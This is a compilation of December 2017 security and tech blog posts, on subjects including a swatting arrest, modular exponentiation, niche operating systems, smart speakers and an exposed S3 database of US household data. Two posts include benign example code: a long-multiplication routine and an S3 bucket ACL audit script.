Alleged “Call of Duty” swatter arrested in LA after fatal shooting


A 25-year-old man has been arrested in Los Angeles in connection with a recent swatting incident in Wichita, Kansas.

According to investigative cybersecurity journalist Brian Krebs, who has been the victim of swatting attacks himself from crooks he has outed on his blog, this incident “reportedly originated over a $1.50 wagered match in the online game Call of Duty.”

“Swatting” involves calling the emergency services and quite deliberately making a false report of a violent incident at someone else’s address so that armed police turn up and storm the place, believing that a serious crime is in progress.

The word comes from the abbreviation SWAT, short for Special Weapons And Tactics, the name given to law enforcement teams that are dispatched to respond to this sort of incident.

At the very best, the outcome of a hoax “swat” call is that the victim suffers a traumatic experience from being confronted by armed police.

Sadly, however, the result was much worse in the recent Kansas incident: a man at the property was shot and killed by mistake in the course of the raid.

As Krebs explains it:

It appears that the dispute and subsequent taunting originated on Twitter. One of the parties to that dispute — allegedly using the Twitter handle “SWauTistic” — threatened to swat another user who goes by the nickname “7aLeNT“. @7aLeNT dared someone to swat him, but then tweeted an address that was not his own.

Swautistic responded by falsely reporting to the Kansas police a domestic dispute at the address 7aLenT posted, telling the authorities that one person had already been murdered there and that several family members were being held hostage.

Police in Wichita, Kansas, have published the audio of the swatting call, during which a male voice can be heard saying:

(Caller) There was an argument with my mom and dad […] They were arguing and I shot him in the head and he’s not breathing any more […] (Dispatcher) Do you have any weapons on you? […] (Caller) Yeah, I do […] a handgun.

Later on, the caller claims to be pointing the gun at his mother and his little brother “to make sure they stay in the closet.”

When the dispatcher asks if he’ll give up the gun, he replies that “if you guys are going to send someone round here, I’m definitely not going to put it away,” and warns the dispatcher that he’s doused the house with gasoline (petrol) and might set it on fire.

Krebs goes on to describe how someone claiming to be the perpetrator made online contact with him shortly after the incident; Krebs ascertained that his anonymous contact seemed to have a history of making fake bomb threats and falsely calling armed police to other people’s houses.

According to Krebs, this person told him that “bomb threats are more fun and cooler than swats in my opinion and I should have just stuck to that.”

If the suspect arrested in LA turns out to be the guilty party in this tragic escalation of a Twitter argument, he may have cause to change his mind about how “cool” such behaviour really is.

Our thoughts go out to the family of the innocent victim in this sordid saga.



from Naked Security http://ift.tt/2q0otLL

Fancy a T-shirt? Try our New Year’s #sophospuzzle crossword…


Are you working over the New Year?

Well, whatever you’re up to – but especially if you’re on sysadmin or tech support duty while the rest of us are partying – here’s a bit of fun that looks just like real work but isn’t. (Don’t let on that we said so.)

Presenting the NYE 2017 #sophospuzzle crossword:


There’s a Sophos T-shirt for the first correct solution received, and a T-shirt for one other successful solver chosen from the rest of the correct answers received in time.

The cutoff for entries to be eligible for a T-shirt is 2018-01-02T12:00T-10 (that’s noon in Hawaii on the day after New Year’s Day).

If you get stuck, try a search engine; if you’re still stuck after that, try following @NakedSecurity on Twitter, and keep your eye on the hashtag #sophospuzzle.

(All we ask is that you don’t spoil it for other people – public hints and teasers are fine, but please don’t blurt out complete answers.)

You are also welcome to email us for hints on tips@sophos.com if you don’t use Twitter, or if you want to keep your hints to yourself.

To try for a T-shirt, take a screenshot when you have finished the puzzle, and email it to us.

Please put the text SOLUTION at the start of the subject line, and let us know in the email if you’re OK with being named amongst the solvers.

You can tell us some or all of: your name, nickname, city, country and Twitter handle – or choose to stay anonymous. (We’ll only use your email address to contact you if you win a shirt – we won’t add you to any mailing lists, honest)

Good luck with your puzzling, and, from the Naked Security team, Happy New Year!



from Naked Security http://ift.tt/2BThndA

Holiday Fun #3: It’s (never) too late to learn long multiplication!

So far this week we’ve looked at Question 1 and Question 2 in our holiday-fun suggestions for technodiversions you might like:

  1. Install a non-mainstream operating system. Because you can.
  2. Fool around with software you used to love. No one will know.
  3. Rewrite a well-known algorithm from scratch. Prove you can still code.

Today, it’s time to consider Question 3:

You settle down to rewrite a well-known algorithm from scratch, to prove you can still code. Which do you choose?

Modular exponentiation
Quicksort
Conway’s Game of Life

Let’s start at the beginning…

Modular exponentiation

One good reason to learn about modular exponentiation is that it’s a very handy algorithm in cryptography.

Indeed, modular exponentiation can be used to agree on a secure, secret encryption key with someone else, even if you have to use a public, insecure network for your communication. (Look for Diffie-Hellman-Merkle, also abbreviated to Diffie-Hellman or just DH.)

The trick is that modular exponents are easy – or, at least, fairly easy – to calculate, but as good as impossible to reverse.

If you remember your school mathematics, exponentiation is repeated multiplication; the inverse (the operation that gets you back where you started) is a logarithm, or log for short.

For example, 2 to the power 3 is 2×2×2, and works out to be 8 (2^3 = 8, for short); going backwards, we say that the logarithm to the base 2 of 8 is 3 (log_2 8 = 3).

In general, if b^E = Y, then log_b Y = E.

(The base is the number at the bottom – the value that gets multiplied by itself over and over – and the exponent it’s raised to is the elevated number above the base – the number of repeated multiplications you need to do.)

Calculating 2^3 in your head is easy, but working out log_2 8 is much trickier.

In fact, it’s easiest to start the other way around and use approximation: keep on multiplying 2 by itself until you hit, or get close to, the answer you’re looking for.

In cryptography, modular exponentiation complicates things still further: after each repeated multiplication, you divide the result by a specially chosen prime number, known as the modulus, and keep only the remainder.

Once you add the “take the remainder” step into the exponentiation process, it becomes as good as impossible to reverse the process algebraically: there’s no formula to compute a modular logarithm, so you pretty much have to try every possible input until you hit upon the solution by chance.

In general, if b^X mod P = Y, then you can quickly calculate Y given X, but there is no shortcut by which you can solve the equation backwards for X if you are given Y.

How quick is “quick”?

We glibly said above that “you can quickly calculate Y given X“, but just how quick is “quick”?

Let’s ignore the modulus part for now, and just consider the repeated multiplications, given that in cryptographic calculations we aren’t usually multiplying single-digit numbers like 2×2, but dealing with numbers that have hundreds or even thousands of digits.

Most modern computers can only multiply 64-bit values in one go, and typical IoT computers or smartcards may only be able to do calculations 32 bits or 16 bits at a time.

We need to break the multiplication down into chunks we can compute, just as you do in the old-school process of long multiplication.

Long multiplication lets you multiply big numbers such as 745×368 one digit at a time, because:

745 x 368 = 745 x (3x100 + 6x10 + 8x1)
          = 745x3x100 + 745x6x10 + 745x8x1
          = (7x100 + 4x10 + 5x1) x (3x100) + (7x100 + 4x10 + 5x1) x (6x10) + . . .
          = (7x3 x100x100 + 4x3 x10x100 + 5x3 x1x100) + . . . etc.

Multiplying by 10, 100, 1000 and so on is easy (just add the correct number of zeros onto the end), so long multiplication means you replace a single 3-digit by 3-digit multiply with nine 1-digit by 1-digit multiplies.

Here’s how to do long multiplication with pen and paper, if you’ve never seen it before:

That approach is quick enough for numbers that you might call “biggish”, but you get bogged down fast when the numbers become huge.

For example, using this algorithm to multiply together two 2048-bit prime numbers so you only work on 64 bits at a time means splitting each number into 32 chunks of 64 bits each, and therefore needs 32×32 = 1024 multiplies.

If you have a 32-bit CPU, you’ll need to do 64×64 = 4096 multiplies to produce all the intermediate results, and then do all the necessary addition operations to combine them into a multi-precision result.

In general, the complexity goes up as the square of the number of digits, which is OK for small numbers but gets sluggish quickly.
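As an added example (not code from the original post), here is the schoolbook long-multiplication algorithm above written in Python, working on “digits” of an arbitrary base and counting the single-digit multiplies. With base 10 it reproduces the 745 × 368 working (nine one-digit multiplies); with base 2^64 or 2^32 it reproduces the 1024 and 4096 multiply counts quoted above for two 2048-bit operands. The function names and the 2048-bit sample operands are my own constructions.

```python
# Added example: schoolbook ("long") multiplication, digit by digit,
# with a counter for the single-digit multiplies.
# Illustrative code, not from the original post.

def to_digits(n: int, base: int) -> list:
    """Split a non-negative integer into little-endian digits in `base`."""
    if n < 0 or base < 2:
        raise ValueError("n must be >= 0 and base >= 2")
    digits = []
    while n:
        n, d = divmod(n, base)
        digits.append(d)
    return digits or [0]


def from_digits(digits: list, base: int) -> int:
    """Inverse of to_digits: rebuild the integer from little-endian digits."""
    n = 0
    for d in reversed(digits):
        n = n * base + d
    return n


def long_multiply(a: int, b: int, base: int = 1 << 64):
    """
    Multiply a and b using only digit-by-digit products in `base`
    (with base 2**64 each product is what a 64-bit CPU does in one go).
    Returns (product, number_of_single_digit_multiplies).
    """
    da = to_digits(a, base)
    db = to_digits(b, base)
    acc = [0] * (len(da) + len(db))   # enough columns for the full result
    mults = 0
    for i, x in enumerate(da):
        carry = 0
        for j, y in enumerate(db):
            # One digit-by-digit multiply. digit*digit + column + carry is
            # always < base**2, so the carry always fits in a single digit.
            cell = x * y + acc[i + j] + carry
            mults += 1
            acc[i + j] = cell % base
            carry = cell // base
        acc[i + len(db)] = carry       # this column is still untouched
    return from_digits(acc, base), mults


if __name__ == "__main__":
    print(long_multiply(745, 368, base=10))   # (274160, 9)
    # Constructed 2048-bit operands (not primes, just 2048 bits long).
    p = (1 << 2048) - 159
    q = (1 << 2048) - 1125
    for bits in (64, 32):
        prod, n = long_multiply(p, q, base=1 << bits)
        print(bits, "bit limbs:", n, "multiplies, correct:", prod == p * q)
```

The counter only tallies the digit products, not the additions and carries needed to combine them, which is the same simplification the text makes; the quadratic growth is visible in the jump from 1024 to 4096 when the limb size halves.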

Cutting down the work

Multiplication quickly becomes computationally expensive, given that doubling the lengths of the numbers involved (for example, going from 1024-bit cryptographic keys to 2048-bit keys to stay ahead of crackers) will typically quadruple the workload.

Of course, exponentiation with huge powers means lots of multiplying, so anything we can do to reduce the number of individual multiplies will help enormously.

Handily, when it comes to exponentiation, there’s a shortcut based on the fact that we aren’t multiplying together two arbitrary numbers each time – we’re multiplying by the same number (the base) over and over again.

So, we can repeatedly multiply the result of each previous multiplication with itself, instead of multiplying by the base each time:

And that’s the trick known as exponentiation-by-squaring: after N-1 loops, you reach your base to the power of 2^(N-1), rather than just to the power of N. (Above, after 4 loops we get to 5^16 on the right but only to 5^5 on the left.)

And with all the powers of 2 up to 2^(N-1), you can represent any number up to 2^0 + 2^1 + … + 2^(N-1), which just happens to be 2^N − 1, so you can represent any exponent up to 2^N − 1, and therefore you can compute your base raised to the power 2^N − 1 with at most N multiplies.

Actually, you need at most 2N multiplies, because you need N multiplies to do all the squaring, plus up to another N multiplies more to combine the various powers to get the result.

But if your exponent is 2048, that means you’ll need at most 2 × log_2 2048 multiplies to get the job done, instead of naively looping round 2047 times – that’s a workload of 12/2047, or well under 1% of the effort.

What next?

Unfortunately, there just wasn’t time in this article to deal with the other two algorithms in today’s quiz question, so we’ll have to ask you to wait for us to cover them some time in the New Year.

In the meantime, why not take our Holiday Fun quiz (and watch out for our New Year’s #sophospuzzle crossword, coming soon to Naked Security)?



from Naked Security http://ift.tt/2BTHlh2

Holiday Fun #2: Relove some old software…

In our holiday quiz, we made three suggestions for techno-geeky diversions you might like to try:

  1. Install a non-mainstream operating system. Because you can.
  2. Fool around with software you used to love. No one will know.
  3. Rewrite a well-known algorithm from scratch. Prove you can still code.

Yesterday, we took at a look at Q1, and the three answers we presented for you to choose from.

Today, it’s time for Q2:

You’re on your own, so you can fool around with software you used to love and no one will know. Which do you choose?

Emacs
TeX (keep it real – no LaTeX allowed)
Leisure Suit Larry in the Land of the Lounge Lizards

To be honest, today’s question is more humorous than serious – not least because two of the software packages listed above are still in widespread use, while the third isn’t, at least not at work.

But here goes, anyway.

Emacs

In simple words, Emacs is a text editor – but don’t call it that, whatever you do, because the name itself is short for Editing MACroS, an extensible environment for building a flexible text editor, among many other things.

Indeed, Emacs does a lot more than just letting you work on files – the GNU Emacs flavour of the app that ships with Apple’s macOS even includes a manifesto about “free” software, accessible by pressing Ctrl-H Ctrl-P. (We used to think that was shorthand for Help/Propaganda, but it seems that it might just be Help/Project.)

Most Emacs implementations are written predominantly in the Lisp programming language, with a small Lisp interpreter at the heart of the software to make it all work.

The Lisp engine inside Emacs makes it extremely extensible, with add-on packages available so you can do everything from reading your email to browsing the internet without leaving the editor at all – indeed, without so much as starting up a second program that communicates with Emacs.

If you’re familiar with Microsoft’s DDE (dynamic data exchange), for example, you’ll know that Word and Excel can be loaded side by side and exchange data in real time – but that sort of software integration isn’t the Emacs way.

If Office were like Emacs, you’d have Excel implemented as a set of macros inside Word, or Word written as macros inside Excel – or, better yet, you’d have Word and Excel programmed as macros inside Powerpoint.

As you can imagine, that means a running Emacs instance often isn’t small.

Indeed, you’ll sometimes hear Emacs antagonists telling you that it’s short for Eighty thousand Megabytes And Continuously Swapping. (Actually, the disparaging name started off as “eight megabytes”, back when a megabyte of physical memory would draw breaths of amazement, but we’ve corrected for the current era.)

In the Unix and Linux worlds, the two best-known editors are Vi (short for VIsual editor) and Emacs, and once you’ve settled into one camp or the other, it’s rare to switch sides.

When we polled Naked Security readers on Twitter, this is what we got:

If you’re one of the 15% who use Emacs to this day, please accept our apologies for implying that Emacs is a pile of “old software” that you used to adore but fell out of love with.

And if you’re a Vi user, why not show some holiday goodwill and give Emacs another try? (Only kidding!)

TeX

TeX, which is properly written (and pronounced) as if it were in Ancient Greek, has the middle letter set below the others, just to show what it’s capable of.

The name looks a little bit – but not actually – like this: TEX.

You can tell that a document was typeset using TeX at a glance, because it will look fiercely and proudly scientific, in the fashion of this paper published in the Annals of Improbable Research:

TeX is still enormously popular amongst academics, notably with mathematicians, physicists and computer scientists, not least because of the ease with which it can typeset mathematical formulas and proofs.

Those three disciplines have by far the best parties – especially low-temperature physicists, because someone is bound to show up with a bucket of liquid nitrogen, with two fantastic outcomes: a bubble monster, and on-demand ice cream.

So if you can get yourself invited, be sure to take advantage, but make sure you don’t commit either of these social blunders:

  1. Don’t pronounce TeX as though you were talking about Texas, or even as though you were saying the start of the word technology. Pretend you are talking about a Scottish loch, and add a gentle guttural roll to it, och aye. In the jargon, say it as a voiceless velar fricative.
  2. Don’t refer to TeX as a word processor, or even as a document formatter. It’s a typesetting system. In fact, play ignorant and don’t mention TeX at all. Say, “I love your paper – I see you had it typeset professionally.”

(If you do make either of these mistakes, don’t panic: bring along a bottle of chocolate milk as a backup. A few seconds in the LN2 and they’ll be eating out of your hand. Literally.)

Leisure Suit Larry

We’re not sure quite how to explain this one, so we’ll just show you what the packaging looked like back in 1987, when it came out:

A picture is worth 1000 words, even if they were only 16-bit words back then – that’s all we’re saying.

What next?

Why not take our quiz now – it’s anonymous, and we think it’s fun:



from Naked Security http://ift.tt/2lnBQQN

The "Extended Random" Feature in the BSAFE Crypto Library

Matthew Green wrote a fascinating blog post about the NSA's efforts to increase the amount of random data exposed in the TLS protocol, and how it interacts with the NSA's backdoor into the DUAL_EC_PRNG random number generator to weaken TLS.


from Schneier on Security http://ift.tt/2Chx4yL

Wednesday, December 27, 2017

Holiday Fun #1: Try an unusual operating system…

Just before Christmas, we put together a holiday-fun quiz to find out what sort of techno-geeky diversions you’d like to lose yourself in, assuming that [a] you have some time off work and [b] you have some online time to spare.

There are three suggestions in the quiz:

  1. Install a non-mainstream operating system. Because you can.
  2. Fool around with software you used to love. No one will know.
  3. Rewrite a well-known algorithm from scratch. Prove you can still code.

But what about the answers?

We pre-selected three answers for each question, and we asked you to pick one of our choices.

So we thought we’d review the questions one by one over the course of this week to encourage you to take part if you haven’t already. (Actually, given that it’s just for fun, you can vote again if you change your mind – that’s fine with us.)

Today, we’re going to look at Q1:

You decide to install a non-mainstream operating system. Because you can. Which do you choose?

HaikuOS
Minix
Plan 9 from Bell Labs

This question isn’t a joke – all the choices above are real operating systems you can download and try today.

They’re somewhat off the beaten track for most people, though.

HaikuOS describes itself as “an open-source operating system that specifically targets personal computing. Inspired by the BeOS, Haiku is fast, simple to use, easy to learn and yet very powerful.”

There hasn’t been an official version, however, since the Alpha 4 release in November 2012. (Even the apology about the age of the release is out of date, saying “Alpha 4 is now almost 5 years old.”)

So, we went for the latest nightly build, currently haiku-nightly-hrev51712, and we went old-school with the 32-bit build on the grounds that it’s still binary compatible with the long-defunct 32-bit BeOS product from the 1990s.

I remember BeOS fondly, because it was, well, it was cool.

BeOS supported all sorts of multimedia stuff smoothly; you didn’t have to spend hours hacking around with X11 configuration files; there was no time-consuming cross-your-fingers-twice configure-and-make stage; and it had a consistent, clean, reliable window manager that looked superb.

But it was wacky, too: I once did a test install and everything worked – my network card, the graphics card that was a science project to use under Linux, everything, except the keyboard. Go figure.

Well, no such trouble with the HaikuOS nightly build – in a VirtualBox VM, it took no more than a few seconds to get a live desktop booted and running and the Naked Security website loaded in the WebPositive browser:

Just like the 1990s, when BeOS was around, the speed was astonishing, lagginess was non-existent, the graphics rendering crisp, and the look surprisingly contemporary. (That’s one way of saying that BeOS was ahead of its time.)

We won’t make any recommendations beyond that, however: we couldn’t figure out how to view the TLS certificate of the website you just connected to, or to check the ciphers supported and used by the browser, so we have no idea how safe you’re likely to be using it.

Nevertheless, it’s worth trying out HaikuOS just to feel how fast software can be if it really tries.

Our next experiment was Minix, a venerable, free operating system that was not only the inspiration for Linux but also the starting point for Linus Torvalds to get a running system on which to begin development.

Linux, however, ended up very much unlike Minix, and much more like every other mainstream operating system on the market today.

In Linux, user programs run outside the kernel, in what’s known as userland, so they can be regulated pretty closely, but the kernel itself is a vast, sprawling underground edifice that houses all the low-level code – what’s known as a monolithic kernel.

Minix comes from a different starting point: it’s a microkernel, where the privileged code in the kernel itself is kept to a minimum and as much code as possible, including the low-level drivers that control the hardware itself, runs in userland.

The theory is simple: start with the goals of security and maintainability, and worry about performance later.

That makes Minix a fantastic learning tool, and worth trying out if you haven’t done so already.

Like HaikuOS, Minix releases are something of a rarity, with the most recent official version being 3.3.0 from November 2014.

We wanted something more recent, so we used the 3.4.0rc6 snapshot from May 2017; this includes a basic X Window System so you can fire up a graphical interface right away.

Yes, that’s twm, short for Tom’s Window Manager, with its default apps: three xterms and an xclock.

Welcome to 1987, complete with X started as root and a bunch of root terminals open by default – for all the caution in its design, the Minix installer advises you to set everything up with a root login and then leaves you to get security right later on.

Ironically, the most recent Firefox file we could find in the official online package repository was 49.0, and that turned out to be the language files only, not the browser itself.

We decided to use the venerable text-mode browser Lynx instead, but the version offered to us didn’t seem to speak a recent enough dialect of TLS, so we tried links, another text-mode browser, as you can see above.

If you get any further than this (a recent Firefox would be nice to see), do let us know in the comments.

And that brings us to Plan 9 from Bell Labs.

Named after the cult 1950s science fiction movie Plan 9 from Outer Space – a strange namesake for a software product to choose, given that the movie’s fame comes from its reputation as the worst film ever made.

Amusingly, Plan 9’s mascot is Glenda, named after the movie Glen or Glenda, an early 1950s film about transvestism from the same director, Ed Wood. (By some accounts, Glen or Glenda was even worse than Plan 9 from Outer Space.)

Plan 9 was a research project at Bell Labs that can be considered decades ahead of its time: everything in the operating system is treated like a file, including devices, traditional files, processes, network connections and more.

Instead of different naming conventions and programming interfaces for local and remote commands, local and network-based files, local and distributed computing jobs…

…there was one input/output protocol to rule them all, 9P.

Where Unix has the cat command to dump data out of files, but needs a completely different command called netcat to shovel data across the network, Plan 9 doesn’t.

Whether a file is moving along a disk cable, across a network link or between two processes in memory (even two processes on different computers), in Plan 9 you can use the same command everywhere.

Plan 9 never really emerged from the research world into real life – the project didn’t survive the enforced breakup of US telecommunications provider AT&T, of which Bell Labs was a part.

What next?

Why not take our quiz now – it’s anonymous, and we think it’s fun:



from Naked Security http://ift.tt/2zDsmGd

We all need IT! (Happy holidays from Sophos)


Spare a thought for the IT heroes who are working away right now so that you can stay online over Christmas.

Sure, it’s their job – they knew that the holiday season was coming and that someone would need to be on duty, just to make sure that you would be able to post that cool new cat video you made on Christmas Day.

And, sure, it’s their job all year round – so they should be used to it by now.

But that’s no reason not to say a big thank you!

So, we wrote a song for all the heroes in IT, and we invited the world’s 25 most famous singers to perform it.

Here’s what happened:

(Can’t see the video directly above this line? Watch on YouTube instead.)

PS. For everyone who isn’t getting a holiday at New Year, but who will be on duty in front of a keyboard and a screen, we’ve got something coming up for you: a #sophospuzzle crossword. That’s right, you can sit right at your desk, looking busy and, if the truth be told, actually being busy! Better still, you’ll actually be learning something about computer security at the same time. (That’s the excuse to give if you need it.) So, watch this space for details. OK, not this place. Not literally. But watch this website, or keep your eye on the hashtag #sophospuzzle on Twitter to find out when the puzzle starts. (We’ll be sending a Dance like Nobody’s Watching T-shirt to the fastest solver, so the sooner you start solving, the brighter your chances.)


from Naked Security http://ift.tt/2C0OIHu

Post-Quantum Algorithms

NIST has organized a competition for public-key algorithms secure against a quantum computer. It recently published all of its Round 1 submissions. (Details of the NIST efforts are here. A timeline for the new algorithms is here.)


from Schneier on Security http://ift.tt/2pGdnM3

Friday Squid Blogging: Gonatus Squid Eating a Dragonfish

There's a video:

Last July, Choy was on a ship off the shore of Monterey Bay, looking at the video footage transmitted by an ROV many feet below. A Gonatus squid was spotted sucking off the face of a "really huge dragonfish," she says. "It took a little while to figure out what's going on here, who's eating whom, how is this going to end?" (The squid won.)

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.


from Schneier on Security http://ift.tt/2DyR79C

How to Set Up a Basic Smart Home Sound System

Our Homehackers video series is back to help you convert your typical casa into a super cool smart home. In this episode, we cover the basics of smart home stereos and talk about your best entry-level options for listening to music in any room at your place.

I meet up with household tech expert John Quain at Homehackers HQ once again to learn about the smart sound systems most people are rockin’ these days. First up is the Bose SoundLink Color Bluetooth speaker II, which is the easiest to set up, has great sound quality for a $130 speaker, and is battery powered so you can take it anywhere (even if you’re not at home). Next up is the $150 Amazon Echo Plus, which is a great option for non-audiophiles who want the functionality of Alexa and don’t mind good but not great sound quality. Last but not least, the popular Sonos PLAY:1 has superb sound quality and allows you to set up multiple speakers in the same room for $200 each (current new low price is $150).


After we go over the basics of each speaker, JQ shows us how to quickly pair your smartphone with the Bose speaker via bluetooth, set up the Amazon Echo Plus and download music skills in the Alexa app, and get a Sonos sound system up and running right out of the box. Be sure to check out our other Homehackers episodes on setting up a smart home hub and water sensor, as well as our video guide to smart lighting and wireless security cameras.

Credits:
Director - Kiran Chitanvis
Line Producer - Anastasia Weeks
Associate Producer - Zoe Stahl
Director of Photography - Tomas Velasquez
B Camera - Jorge Corona
Additional Camera - Bernardo Garcia
Sound Recordist - Kathy Lee
Production Designer - Susan Chau
Gaffer - Michael Kim
Editor - Eddie Costas
Editor - Hannah Whisenant
Production Assistant - Tiffani DuPree

Special Thanks to CORE Real Estate NYC and 60 White
from Lifehacker http://ift.tt/2zgnp61

I'm Feminist Press Director Jamia Wilson, and This Is How I Work

Jamia Wilson grew up reading books from the Feminist Press, so she’s proud to be the literary publisher’s executive director (the youngest person, and the first woman of color, to lead the 47-year-old press). When she became director, Wilson was already an outspoken activist and writer whose work had appeared in the Feminist Press titles Slut and I Still Believe Anita Hill. We talked to Wilson in print and on video about her work habits, her inspirations, and the concrete ways the Press fosters teamwork.


Current Gig: Executive Director at the Feminist Press at City University of New York
One word that best describes how you work: Thoughtfully
Current mobile device: A gold iPhone 6 and iPad
Current computer: Macbook Pro and Apple Desktop

Take us through a recent workday.

Here’s a snapshot of a recent workday from my planner:

  • Morning prayers
  • Get my blood pumping by jumping on my rebounder
  • Read the news and check Twitter to stay up to speed on the #resistance
  • Send edits in on a personal book project
  • Subway to work
  • Staff meeting
  • Emails
  • Review cover art and go over editorial checklist
  • Follow up with donors to our Giving Tuesday appeal
  • Planning for upcoming staff annual reviews
  • Meet with Instagram book bloggers from Australia
  • Teach at John Jay College of Criminal Justice
  • Debrief with co-prof
  • Netflix
  • Bed

What apps, gadgets, or tools can’t you live without?

I can’t live without my label maker. I’m also a big believer in handwritten notes in the digital age. I keep a stack of stationery ready at work and at home. Expensify. Voice memo. Evernote. Dropbox. Google Suite...and of course, Venmo.

What’s your workspace setup like?

I keep my space pretty open and spacious. I have a desktop Mac, a phone, files, oodles of books, and a ficus plant that my board gave me as a gift.

What’s your best shortcut or life hack?

The Instant Pot has changed my life. I have food allergies and need to prepare a lot of my own food. It’s nice to have one appliance that can do 7 things efficiently.

Who are the people who help you get things done, and how do you rely on them?

The Feminist Press team is super collaborative. Everyone is passionate about our mission and ready to roll up their sleeves to achieve our goals.

How do you keep track of what you have to do?

Danielle LaPorte’s Desire Map Planner Weekly keeps me focused on enlivening my purpose through my tasks. Google Calendar helps me manage my schedule.

What’s your least favorite thing to do, and how do you deal with it?

I don’t love the subway. I wish I could beam myself to work and back every day. Manspreading is a real phenomenon. Luckily, I can hold my own.

How do you recharge or take a break from work?

Walking meditations help me release stress. I also enjoy listening to my husband play classical piano, binge-watching The Crown and She’s Gotta Have It on Netflix and curling up with a good book.

What’s your favorite side project?

Writing, writing, and more writing.

What are you currently reading, or what’s something you’d recommend?

I’m currently reading Your Art Will Save Your Life by Beth Pickens.

Fill in the blank: I’d love to see ____ answer these same questions.

Susan McPherson.

What’s the best advice you’ve ever received?

“When we speak we are afraid our words will not be heard or welcomed. But when we are silent, we are still afraid. So it is better to speak.”—Audre Lorde


Next, check out Jamia’s advice on public speaking.

This interview has been lightly edited and some links have been added.

The How I Work series asks heroes, experts, and flat-out productive people to share their shortcuts, workspaces, routines, and more. Have someone you want to see featured, or questions you think we should ask? Email Nick.


from Lifehacker http://ift.tt/2BXTBAn

Data on 123 million US households exposed


What surprising things might a keen data hunter find sitting in an unsecured state on a cloud service these days?

For a researcher at UpGuard, on 6 October the answer turned out to be an intriguing 36GB database file sitting in plain view on an Amazon Simple Storage Service (S3) bucket uploaded by analytics company Alteryx.

Leaky bucket might be a better description because when opened the database revealed the personal financial data of 123m American households – in effect everyone with an address in the US around the time of the file’s creation in 2013.

Let’s digest this: regardless of whether you’ve heard of Alteryx or not (and few will), if you’re a US householder, a humungous trove of your personal data was inside this easily-accessible file.

And quite a cache it was too, comprising 123m rows, each with 248 columns, drawn from the US Census Bureau and bulked out with a “massive” amount from credit-reporting company Experian.

What data? It’d be easier to say what wasn’t in the database in fact. UpGuard quotes Experian’s marketing blurb used to sell the data to third parties such as Alteryx:

With thousands of attributes on more than 300 million consumers and 126 million households, ConsumerView data provides a deeper understanding of your customers, resulting in more actionable insights across channels…

No wonder Alteryx wanted it. In case anyone assumes the data was anonymised, UpGuard reckons:

While the spreadsheet uses anonymized record IDs to identify households, the other information in the fields – as well as another spreadsheet in the bucket – are sufficiently detailed as to be not merely often identifying, but with a high degree of specificity.

In addition to trifles such as address, telephone number and estimated income, this included home valuations, when householders last bought a car, what magazines they subscribe to, how much they like to travel, their cat ownership – you name it.

Experian clearly knows an awful lot about Americans and has been trading it around partners to use, one of which didn’t secure it well, or at all.

All UpGuard needed to access the data was a free Amazon Web Services (AWS) account, which anyone can open: the bucket had been shared with the S3 “Authenticated Users” group, which means every AWS customer in the world, not merely users authorised by Alteryx. That marks this incident as the sort of screw-up security people will be quoting as a cautionary tale in conference presentations for years to come.
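The “any AWS account can read it” condition is visible in the bucket’s own access control list as a grant to the AuthenticatedUsers group (or, worse, AllUsers). Below is an added example, not UpGuard’s or Alteryx’s tooling, that evaluates an ACL document in the shape returned by `aws s3api get-bucket-acl` and boto3’s `get_bucket_acl`, and reports every grant that reaches outside the owning account. The two ACLs it runs on are constructed for the demo; the canonical IDs in them are placeholders.

```python
"""
Flag S3 bucket ACL grants that reach outside the owning account.
Added example; the ACL documents below are constructed for the demo and the
canonical user IDs are placeholders, not Alteryx's real configuration.
"""
from typing import Dict, List

# The two predefined groups AWS exposes in S3 ACLs.  "AuthenticatedUsers"
# means *any* AWS account anywhere, not "users of my account" - exactly the
# condition that let a researcher with a free account read the file.
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "anyone, no credentials needed",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account",
}
AUTHENTICATED_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"

# On a bucket ACL, READ permits listing the bucket and FULL_CONTROL includes
# it; WRITE_ACP lets the grantee rewrite the ACL, which is just as bad.
EXPOSING_PERMISSIONS = {"READ", "FULL_CONTROL", "WRITE", "WRITE_ACP"}


def public_grants(acl: Dict) -> List[str]:
    """One human-readable finding per grant that is not the owner itself."""
    owner_id = acl.get("Owner", {}).get("ID")
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        perm = grant.get("Permission")
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            findings.append(f"{perm} granted to {PUBLIC_GROUPS[grantee['URI']]}")
        elif grantee.get("Type") == "CanonicalUser" and grantee.get("ID") != owner_id:
            # A cross-account grant is not "public", but it is a party outside
            # the owning account and belongs in the report.
            findings.append(f"{perm} granted to foreign account {grantee['ID']}")
    return findings


def is_readable_by_any_aws_account(acl: Dict) -> bool:
    """The specific failure described above: AuthenticatedUsers with read rights."""
    return any(
        g.get("Grantee", {}).get("URI") == AUTHENTICATED_USERS
        and g.get("Permission") in EXPOSING_PERMISSIONS
        for g in acl.get("Grants", [])
    )


# Constructed samples: a private bucket (owner only) and one that mirrors the
# misconfiguration in the story (READ for the AuthenticatedUsers group).
PRIVATE_ACL = {
    "Owner": {"ID": "owner-canonical-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"},
         "Permission": "FULL_CONTROL"},
    ],
}
LEAKY_ACL = {
    "Owner": {"ID": "owner-canonical-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": AUTHENTICATED_USERS},
         "Permission": "READ"},
    ],
}

if __name__ == "__main__":
    for name, acl in (("private", PRIVATE_ACL), ("leaky", LEAKY_ACL)):
        print(name + ":", public_grants(acl) or "no external grants")
```

Feed it the JSON from `aws s3api get-bucket-acl --bucket <name>` for each bucket in an account and the leaky ones fall out. Note that READ on the bucket ACL only permits listing; downloading an object also needs the object’s own ACL or a bucket policy to allow it, so a full audit checks `get-object-acl` and `get-bucket-policy` as well.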

Had the data been noticed by criminals rather than a researcher, the latest incident could easily have ranked as a major breach similar to the one that affected Experian’s rival Equifax in September.

Experian’s odd reaction has been to pass the buck, telling Forbes:

This is an Alteryx issue, and does not involve any Experian systems.

Technically correct but disingenuous. Surely any company handing over large amounts of sensitive data on every household in the US knows it is a loaded weapon in the wrong hands and has a duty to set some standards as to how it will be secured.

